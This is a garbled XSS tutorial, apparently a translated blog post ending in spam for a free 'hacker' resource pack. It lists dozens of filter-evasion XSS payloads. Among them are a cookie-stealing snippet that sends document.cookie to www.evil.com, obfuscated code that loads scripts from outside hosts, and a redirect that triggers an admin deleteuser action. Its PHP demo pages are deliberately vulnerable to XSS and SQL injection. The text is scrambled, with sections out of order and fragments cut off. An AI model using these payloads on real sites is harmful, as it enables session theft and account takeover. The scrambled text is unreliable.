01. Principles and classifications of XSS
Cross-site scripting attack XSS (Cross Site Scripting), in order not to be confused with the abbreviation of Cascading Style Sheets (CSS)
Therefore, the cross-site scripting attack is abbreviated as XSS. A malicious attacker inserts malicious Script code into the Web page. When the user browses the page, the Script code embedded in the Web will be executed, thereby achieving the purpose of maliciously attacking the user. are user-level attacks;
XSS is divided into: storage type, reflection type, DOM type XSS
?
?
stored When the page is executed, the code is executed. This kind of XSS is more dangerous and can easily cause worms and steal cookies;
reflective information;
DOM-type XSS: Without going through the backend, the DOM-XSS vulnerability is a vulnerability based on the Document Object Model (DOM). DOM-XSS is triggered by passing parameters through the url to obtain control. In fact, it is also a reflection type. XSS, detailed explanation of DOM: DOM document object model;
Attributes that may trigger DOM-style XSS
document.refererwindow.namelocationinnerHTMLdocumen.write
02. Dangers of XSS attacks
1. Steal various user accounts, such as machine login accounts, user online banking accounts, and various administrator accounts; 2. Control corporate data, including the ability to read, tamper with, add, and delete corporate sensitive data; 3. Steal corporate data Important information with commercial value; 4. Illegal transfer; 5. Forced sending of emails; 6. Website malware; 7. Controlling the victim’s machine to launch attacks on other websites;
03, XSS test statements
When checking whether there are XSS vulnerabilities in a website, you should enter some tags, such as <, >. After inputting, check whether the web page source code is filtered for tags. If there is no filtering, there is a high probability that there is an XSS vulnerability.
Commonly used test statements:
1
?
1
?
It can be seen that the website does not filter tags;
?
As you can see, there is no pop-up, but 1 is output on the console. We can confirm that XSS does exist;
Closure issue: Many times, when testing XSS, we want to consider the closure issue. We first check the source code of the web page, and we need to first determine whether the website uses single quotes or double quotes;
">x<"
'>x<'
Single line comment:
">x//#Double slash indicates commenting out the following statement
0x04, XSS attack statement
Input detection determines that the tag is not filtered. In order to show that the vulnerability exists, XSS attack code needs to be inserted;
<script>alert(1)</script></code><code><svg onload=alert(1)></code><code><a href=javascript:alert(1)></code><code><a href='javascript:alert(1)'>aa</a>
Copy code
(1) Ordinary XSS JavaScript injection(2) IMG tag XSS uses JavaScript command">
(14) Embedded carriage return
<script>z='document.'</script></code><code><script>z=z + 'write("'</script></code><code><script>z =z + '<script'</script></code><code><script>z=z + 'src=ht'</script></code><code><script>z=z + 'tp ://ww'</script></code><code><script>z=z + 'w.shell'</script></code><code><script>z=z + '.net/ 1.'</script></code><code><script>z=z + 'js></sc'</script></code><code><script>z=z + 'ript>" )'</script></code><code><script>eval_r(z)</script>
Copy code
(17) Null character 12-7-1 T00LS - Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action=printable & amp;tid=15267 2/6perl-e 'print "(18) Null character 2, null character is basically non-existent in China Effect. Because there is no place to use";' > out
perl -e 'print "(19)IMG tag before Spaces and meta(21)Non-alpha-non -digit XSS to 2
<BODY onload!#$% & amp;()*~ + -_.,:;?@[/|\]^`=alert("XSS")>
Copy code
(22)Non-alpha-non-digit XSS to 3(23)Double opening brackets<(24) No closing script tag ( Only browsers such as Firefox)(29) Escape filter JavaScript";alert('XSS');//(30)End Title tag(31)Input Image (32)BODY Image(33)BODY Tag (38)Remote Style Sheet(39)List -style-image(list-style)
(40)IMG VBscript
(42)Iframe( 43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></code><code></FRAMESET>12-7-1 T00LS - Powered by Discuz!</code><code>Boardhttps://www.a.com/viewthread.php?action=printable & amp;tid=15267 3/6
Copy code
(44)Table Copy code (55)EMBED tag, you can embed FLASH, which contains XSS Copy code (67) Copy code (68)URL Detour Attack statements for each label; Label: style tag: Try to find everything that is user-controllable and can be output in the page code, such as the following: Each parameter of the URL URL itself form search bar Hardest-hit areas: comment area, message area, personal information, order information, etc. Target type: In-site messages, web page instant messaging, private messages, feedback There are risks: search box, current directory, image attributes, etc.; The code audit for XSS mainly starts from the place where parameters are received and some key points; Common methods for receiving parameters in PHP include G?ET, _POST, $_REQUEST, etc. You can search for all methods for receiving parameters, and then track the received data to see if it is output to the page, and then look at the output Whether the data in the page has been filtered and html encoded You can also search for output statements like echo to track where the output variables come from, whether we can control it, if it is obtained from the database, whether we can control the data stored in the database, whether it is filtered before being stored in the database, etc. ; Most programs will uniformly call functions that receive parameters encapsulated in public files. We need to audit these public functions to see if they are filtered, whether they can be bypassed, etc.; In the same way, when auditing DOM injection, you can search for some JS keywords that operate on DOM elements for auditing; 1. Alice often browses a website, which is owned by Bob. Bob’s site requires Alice to log in with a username and password, and stores Alice’s sensitive information (such as bank accounts); 2. Tom discovered that Bob’s site had a reflected XSS vulnerability; 3. Tom used the reflected XSS vulnerability of Bob’s website to write an exp in the form of a link, and used various means to induce Alice to click 4. After Alice logged in to Bob’s site, she browsed the malicious link provided by Tom; 5. The malicious script embedded in the malicious link is executed in Alice's browser. This script steals sensitive information (cookies, account information, etc.) and then sends this information to Tom without Alice's knowledge; 6. Tom can use the obtained Cookie to log in to Bob's website as Alice's identity information. If the script is more powerful, Tom can also control Alice's browser and further exploit the vulnerability; 1. Bob owns a Web site that allows users to publish information and browse published information; 2. Tom detects that Bob’s site has a stored XSS vulnerability; 3. Tom publishes hot information with a malicious script on Bob’s website, which is stored in the database of Bob’s server, and then attracts other users to read the hot information; 4. After Bob or anyone else, such as Alice, browses the information, Tom's malicious script will be executed; 5. After Tom’s malicious script is executed, Tom can launch an XSS attack on the user of the browser page; XSS vulnerabilities can achieve many functions by constructing malicious XSS statements. One of the most common ones is constructing XSS malicious code to obtain the COOKIE of the other party's browser; 1) We first save the malicious code in local kali. In actual combat situations, we save the code on our server; 2) We use python to open the http service in kali; python -m http.server 80 3) We remotely load our malicious code where there is an XSS vulnerability: Seeing the browser loading, our xss malicious code; 4) Successfully obtained cookie information 5) Image creation link This is generally used when the input characters are limited. 7.2. Reflected XSS: The page directly pops up the xss page. You can see that the statement we inserted has been executed by the page. This is the most basic reflected XSS vulnerability. This vulnerability flows to: front end --> back end --> front end We enter 3 and As you can see, our XSS statement has been inserted into the database; Then when other users visit the show2.php page, the XSS code we inserted is executed; The data flow direction of stored XSS is: front end --> back end --> database --> back end --> front end First put the source code: We can enter The hack page pops up directly on the page, and the statement we inserted has been executed by the page; This is a DOM type XSS vulnerability. The data flow direction of this vulnerability is: front end --> browser If gpc is turned on, special characters will be appended with slashes, that is, 'becomes'. Do not use single quotes or double quotes in the xss attack code; Bypass gpc In higher versions of PHP, gpc is not available by default, but developers will use addcslashes() to escape special characters; To learn a new technology, as a novice, you must learn the growth roadmap first. In the wrong direction, efforts will be in vain. For students who have never been exposed to network security, we have prepared a detailed learning and growth roadmap & learning plan for you. It can be said to be the most scientific and systematic learning route. It will be no problem for everyone to follow this general direction. Many friends don’t like obscure texts, so I have also prepared video tutorials for everyone. There are a total of 21 chapters, and each chapter is a condensed essence of the current section. Everyone’s favorite and most concerned SRC technical books & hacker technology are also included SRC technical documents: Since hacker information is a sensitive resource, it cannot be displayed directly here! Regarding the HW network protection operation, corresponding information has also been prepared. This content can be equivalent to the golden finger of the competition! 5. A must-read list for hackers 6. Collection of interview questions When you learn this by yourself, you will start to think about finding a job, and the things that cannot be avoided in work are real questions and interview questions. If you need a complete set of "Network Security & Hacking Technology from Zero Basics to Advanced Learning Gift Pack" totaling 282G, you can scan the QR code below to get it for free< /strong>! (45)TD
(46)DIV background-image (1-32 & amp;34 & amp;39 & amp;160 & amp;8192-8 & amp;13 & amp;12288 & amp;65279) ** expression(alert("XSS"))'>(53)STYLE background
<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code><code>(54)BASE</code><code><BASE HREF="javascript:alert('XSS');//">
(56) Use ActionScrpt in flash to mix in your XSS codea="get";b="URL("";c="javascript:";d ="alert('XSS');")";eval_r(a + b + c + d);(57) The XML namespace.HTC file must be on the same server as your XSS vector onimplementation="http://3w.org/XSS/xss.htc">(58) If your JS is filtered, you can add JS code to the image to take advantage of it(59)IMG embedded command, can execute any commandRedirect 302 /a.jpg http://www.XXX. com/admin.asp &deleteuser(61) Symbol filtering·(62) (63)< strong>(64)(65 )(66)
12-7-1 T00LS - Powered by Discuz! Board</code><code>https://www.a.com/viewthread.php?action=printable & amp;tid=15267 4/6<SCRIPT a=">'>"</code><code>SRC="http://3w.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
XSS(69)URL EncodingXSS(70)IP DecimalXSS(72)IP OctalXSS(74) Save[ http:]XSS(75) Save [www]XSS(76) Absolute DNSXSS(77)javascript linkXSS<script>alert("hack")</script> #Popup hack</code><code><script>alert(/hack/)</script> #Popup hack</code><code>< script>alert(1)</script> #Pop up 1, you don’t need quotation marks for numbers</code><code><script>alert(document.cookie)</script> #Pop up cookie</code><code>< script src=http://xxx.com/xss.js></script> #Reference external xss</code>
svg tag:
<svg onload="alert(1)"></code><code><svg onload="alert(1)"//</code>
Label:
<img src=1 οnerrοr=alert("hack")></code><code><img src=1 οnerrοr=alert(document.cookie)> #Pop-up cookie
<body οnlοad=alert(1)></code><code><body οnpageshοw=alert(1)></code>
video tag:
<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />
<style οnlοad=alert(1)></style>
05. Mining of XSS vulnerabilities
5.1, black box testing
5.2. Common business scenarios
5.3. White box audit
06. XSS attack process
6.1. Reflected XSS vulnerability:
6.2. Stored XSS vulnerability:
07, XSS attack test
7.1. Remote loading attack payload
var img=document.createElement("img");</code><code>img.src="http://www.evil.com/log?" + escape(document.cookie);</code> code><code>document.body.appendChild(img);
?
?
?<img src=''</code><code>onerror=document.body.appendChild(document.createElement('script')).src='//192.168.0.110/xss.</code><code>js'></code>
6) Character splicing
<script>z='document.'</script></code><code><script>z=z + 'write("'</script></code><code><script>z =z + '<script'</script></code><code><script>z=z + ' src=ht'</script></code><code><script>z=z + 'tp ://www.'</script></code><code><script>z=z + 'xsstools'</script></code><code><script>z=z + '.com/a '</script></code><code><script>z=z + 'mER></sc'</script></code><code><script>z=z + 'ript>")' </script></code><code><script>eval(z)</script></code><code>In some cases, /**/ needs to be used to annotate unnecessary code. </code>
7) jQuery loading
<script>$.getScript("//www.xsstools.com/amER");</script>
//Front-end 1.html:</code><code><html></code><code><head lang="en"></code><code> <meta charset="UTF-8 "></code><code> <title>Reflected XSS</title></code><code></head></code><code><body></code><code> <form action ="action.php" method="post"></code><code> <input type="text" name="name" /></code><code> <input type="submit" value=" Submit"></code><code> </form></code><code></body></code><code></html></code>
<code>//Backend action.php:</code><code><?php</code><code> $name=$_POST["name"]; </code><code> echo $name; </code><code>?></code>
We then enter in the input box: <code><script>alert(/xss/)</script>
?7.3. Stored XSS:
//Front end: 2.html</code><code><html></code><code><head lang="en"></code><code> <meta charset="UTF-8 "></code><code> <title>Stored XSS</title></code><code></head></code><code><body></code><code> <form action ="action2.php" method="post"></code><code> Enter your ID: <input type="text" name="id" /> <br/></code><code> Enter Your Name: <input type="text" name="name" /> <br/></code><code> <input type="submit" value="Submit"></code><code> < /form></code><code></body></code><code></html></code><code>//Backend: action2.php</code><code><?php </code><code> $id=$_POST["id"];</code><code> $name=$_POST["name"];</code><code> mysql_connect("localhost"," root","root");</code><code> mysql_select_db("test");</code>
<code> $sql="insert into xss value ($id,'$name')";</code><code> $result=mysql_query($sql);</code><code>?></code><code>//For other users to access the page: show2.php</code><code><?php</code><code> mysql_connect("localhost","root","root");</code><code> mysql_select_db("test");</code><code> $sql="select * from xss where id=1";</code><code> $result=mysql_query($sql);</code> code><code> while($row=mysql_fetch_array($result)){<!-- --></code><code> echo $row['name'];</code><code> }</code><code>?></code>Here is a user submission page. After the data is submitted to the backend, the backend stores it in the database. Then when other users access another page, the backend calls up the data. Displayed to another user, the XSS code is executed;
?, then, we look at the database;
?
?7.4, DOM type XSS
// Front-end 3.html</code><code><html></code><code> <head lang="en"></code><code> <meta charset="UTF-8" ></code><code> <title>DOM type XSS</title></code><code> </head></code><code> <body></code><code> <form action= "action3.php" method="post"></code><code> <input type="text" name="name" /></code><code> <input type="submit" value="Submit "></code><code> </form></code><code> </body></code><code> </html></code><code> // Backend action3.php</code><code> <?php</code><code> $name=$_POST["name"];</code><code>?></code><code><input id="text" type="text" value="<?php echo $name; ?>"/></code><code><div id="print"></div></code><code><script type= "text/javascript"></code><code> var text=document.getElementById("text");</code><code> var print=document.getElementById("print");</code><code> print.innerHTML=text.value; // Get the value of text and output it in print. Here are the main causes of xss. </code><code></script></code>
There is a submission page here where users can submit data. After the data is submitted, it is processed in the background;
?, and then see the page changes;
08, XSS encoding bypass
8.1, gpc filter characters
This cannot be executed Can be executed without single quotes If you are interested in getting started with network security, then you click hereCSDN gift package: "Hacker &Introduction to Network Security&Advanced Learning Resource Pack" to share for free h3>
If you are interested in network security, learning resources are shared for free, guaranteed to be 100% free! ! ! (Heyke introductory tutorial)
1. Growth roadmap & learning plan
?
?2. Video tutorial
?
?3.SRC & Hacker Books
?4. Information on network protection operations
?
?
?To prevent harmonization, you can scan and obtain more content~
?
? If you need it, you can click CSDN gift package: "Hey Guest & Network Security Introduction & Advanced Learning Resource Pack" to share for free